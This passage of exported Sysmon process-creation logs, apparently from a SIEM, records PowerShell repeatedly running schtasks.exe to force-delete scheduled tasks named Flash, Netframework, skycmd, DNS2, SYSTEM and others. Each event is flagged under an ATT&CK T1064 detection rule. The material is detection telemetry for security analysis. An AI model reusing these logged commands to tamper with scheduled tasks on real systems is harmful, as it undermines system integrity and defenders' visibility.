Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Flash /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:04.762698700Z"",""eventRecordID"":""2509"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:04.748\r\nProcessGuid: {df9fc3d3-b37c-5ecf-0000-0010e8a91e00}\r\nProcessId: 1676\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Flash /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:04.748"",""processGuid"":""{df9fc3d3-b37c-5ecf-0000-0010e8a91e00}"",""processId"":""1676"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Flash /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:33.089",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:04.720 +ProcessGuid: {df9fc3d3-b37c-5ecf-0000-001030a81e00} +ProcessId: 6192 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: 
""C:\Windows\system32\schtasks.exe"" /Delete /TN Netframework /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Netframework /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:04.736247100Z"",""eventRecordID"":""2508"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:04.720\r\nProcessGuid: {df9fc3d3-b37c-5ecf-0000-001030a81e00}\r\nProcessId: 6192\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Netframework /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: 
Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:04.720"",""processGuid"":""{df9fc3d3-b37c-5ecf-0000-001030a81e00}"",""processId"":""6192"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Netframework /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:33.059",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:04.695 +ProcessGuid: {df9fc3d3-b37c-5ecf-0000-001070a61e00} +ProcessId: 7116 +Image: 
C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Miscfost /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Miscfost /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:04.697171200Z"",""eventRecordID"":""2507"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:04.695\r\nProcessGuid: {df9fc3d3-b37c-5ecf-0000-001070a61e00}\r\nProcessId: 7116\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" 
/Delete /TN Miscfost /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:04.695"",""processGuid"":""{df9fc3d3-b37c-5ecf-0000-001070a61e00}"",""processId"":""7116"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Miscfost /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 
29, 2020 @ 14:18:33.036",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:04.669 +ProcessGuid: {df9fc3d3-b37c-5ecf-0000-0010b0a41e00} +ProcessId: 1988 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN skycmd /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN skycmd /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:04.681281500Z"",""eventRecordID"":""2506"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:04.669\r\nProcessGuid: {df9fc3d3-b37c-5ecf-0000-0010b0a41e00}\r\nProcessId: 1988\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 
(WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN skycmd /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:04.669"",""processGuid"":""{df9fc3d3-b37c-5ecf-0000-0010b0a41e00}"",""processId"":""1988"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN skycmd /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:33.015",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:04.645 +ProcessGuid: {df9fc3d3-b37c-5ecf-0000-001027a21e00} +ProcessId: 2280 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN SYSTEMa /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN SYSTEMa 
/F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:04.648014900Z"",""eventRecordID"":""2505"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:04.645\r\nProcessGuid: {df9fc3d3-b37c-5ecf-0000-001027a21e00}\r\nProcessId: 2280\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN SYSTEMa /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:04.645"",""processGuid"":""{df9fc3d3-b37c-5ecf-0000-001027a21e00}"",""processId"":""2280"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN SYSTEMa /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:32.989",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:04.618 +ProcessGuid: {df9fc3d3-b37c-5ecf-0000-0010ec9f1e00} +ProcessId: 6948 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN DNS2 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DNS2 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:04.620671600Z"",""eventRecordID"":""2504"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:04.618\r\nProcessGuid: {df9fc3d3-b37c-5ecf-0000-0010ec9f1e00}\r\nProcessId: 6948\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DNS2 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:50:04.618"",""processGuid"":""{df9fc3d3-b37c-5ecf-0000-0010ec9f1e00}"",""processId"":""6948"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN DNS2 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:32.965",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:04.588 +ProcessGuid: {df9fc3d3-b37c-5ecf-0000-0010f59d1e00} +ProcessId: 4716 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN SYSTEM /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium 
